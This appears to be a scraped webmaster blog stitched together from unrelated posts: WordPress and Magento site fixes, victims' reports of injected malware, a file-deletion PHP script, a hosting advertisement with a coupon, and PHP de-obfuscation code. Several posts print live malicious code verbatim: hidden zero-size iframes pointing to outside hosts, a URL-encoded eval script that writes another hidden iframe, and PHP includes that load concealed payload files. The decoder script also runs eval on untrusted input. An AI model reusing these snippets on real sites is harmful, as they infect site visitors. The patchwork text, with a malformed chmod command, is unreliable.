1
2

<?php @include_once(ABSPATH . "/wp-includes/wp-vars.php"); ?>
<?=@get_wp_results('f');?>

This totally screwed my footer section and above that it made my website traffic go to zero. I immediately removed the code and discovered two files:
wp-includes/wp-vars.php encoded with Zend which I am unable to decode. It would be great if someone could decode this so we can see the malicious code.
wp-includes/wp-version.php encoded with base_64 and decoded to :
file_put_contents(‘wp-common.php’,base64_decode($bb) )

I deleted both of these files and everything seems ok now. I was unable to find wp-common.php so I assume it wasn’t created yet.
wp-includes/wp-vars.php encoded with Zendwp-includes/wp-version.php

Downloads:
wp-vars

You obviously can’t work without a menu so i started googling the issue. The first page i looked into gave some indications but nothing clear, and those guys we’re having the problem on ver 1.0 of Magento which is really old.

After trying and testing various methods i finally got it to work, and here is how i did it:

• step1: replace app/code/core/Mage/Page/Block/Html/Head.php with this head.php
• step2: chmod 755 the js/ folder, and folders within.
• step3: chmod 644 the javascript files inside js/lib/
• step4: chmod 644 js/index.php
• step5: there is no step 5 your menu is now working

<code><iframe src=”http://fredkidns.com/check/upd.php?t=562″ border=”0″ height=”0″ width=”0″></iframe></code>
<code><iframe src=”http://bestinlive.cn/i/index.php” border=”0″ height=”0″ width=”0″>
</iframe><script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code>

note: the line is so long that i had to insert line breaks
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.

I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.

<?
{
foreach (glob(“*.txt*”) as $fn) {
unlink($fn);
}
}
header(“Location: /1″);
?>

where *.txt is the extension im looking for delete and /1 is the directory inside im placing the script. I saved the above in a file named Delete.php and placed it inside the directory. Then I chmod’ed the entire directory with the following command:

chmod -R /var/www/1

The script works without a flaw.

This is the phrase i looked on search engines for a couple of days before i choose’d my current webhosting. After reading dozens of articles and peoples reviews i decided to host with SERVAGE and i must say it was a good decision. They are probably the best hosting company on the market providing excellent support together with excellent services. Servage currently offers: 510 GB Web Space, 5010 GB Transfer, Unlimited FTP Accounts, 1000 MySQL Databases, PHP v 4.4.4 & 5.2.1, Shockwave & Flash, XML Support, EXIF Support, SSI Support, Private CGI-BIN, Zend Optimizer, Hotlink Protection, phpMyAdmin, ImageMagick Support, Ruby on Rails, Password Protected Directories, FTP Access, FTPS (Encrypted FTP), GD Support, Microsoft Frontpage Support, WAP Enabled, mod_rewrite Enabled, CGI/Perl, Python Support, ionCube Loader, CURL Enabled, Webbuilder Software Included, Netpbm Support, Wildcard Domains, Full .htaccess Support. Al these for just 6,95 EUR per month and bonus a free domain name included. Well you can see now why i choose’d Servage. The only thing that i was sceptical about was the Uptime, well im with Servage for over 4 month’s and i had no problems with them. And if i had issues with my websites they always kindly help me in solving them. Its great no question about it.

If you would like to get hosting from Servage you can use my coupon code and get 25 Gb extra of storage. My coupon code is CUST44248

Here is the code:

$_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj
JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD
ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ
gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP
SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM
jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ
o8P3BocCAvKiAiSjNzdCB3aDF0IGQyIHkyMyB0aDRuayB5MjMncjUgZDI0bm
cgRDF2NT8iICovID8+DQoNCgkJPD9waHAgd3BfZjIydDVyKCk7ID8+DQo8L2
IyZHk+DQo8L2h0bWw+DQo=';eval(base64_decode('JF9YPWJhc2U2NF9k
ZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdW
llMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0
YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));


For the moment i’m stuck with the code.. and trying to find a solution.. I will give an update if i succeed in decoding it.

Disclaimer: I don’t condone modifying and distributing copyright files, this is simply provided so you can view the plain source to ensure your script isn’t doing anything malicious on your property ie server.

And here is the script and Link to authors page.

<?php
echo "\nDECODE nested eval(gzinflate()) from Taree Internet \n\n";
echo "1. Reading coded.txt\n";
$fp1 = fopen ("coded.txt", "r");
$contents = fread ($fp1, filesize ("coded.txt"));
fclose($fp1);
echo "2. Decoding\n";
while (preg_match("/eval\(gzinflate/",$contents)) {
$contents=preg_replace("/<\?|\?>/", "", $contents); eval(preg_replace("/eval/", "\$contents=", $contents)); } echo "3. Writing decoded.txt\n"; $fp2 = fopen("decoded.txt","w"); fwrite($fp2, trim($contents)); fclose($fp2);
?>

Now the first step you need to take is to save this code in a file named decrypt.php

Second step is to save your encoded file inside a file name coded.txt (make sure you get all the code, i noticed when working with notepad and very long code lines some of the code gets skiped, and you dont want that to happen as the script wont work)

And the third step is to create an empty file named decoded.txt

Now upload all three files on your webserver and chmod the decoded.txt file with 666

Next you need to run the decrypt.php file from your server like this : http://yourdomain.com/path-to-script/decrypt.php. It should display a message about the operation and say “Writing Decoded.txt”. Now you are done the decoded.txt file that was empty should now have inside it the HTML code that you need to place inside your footer.php file and edit at your needs.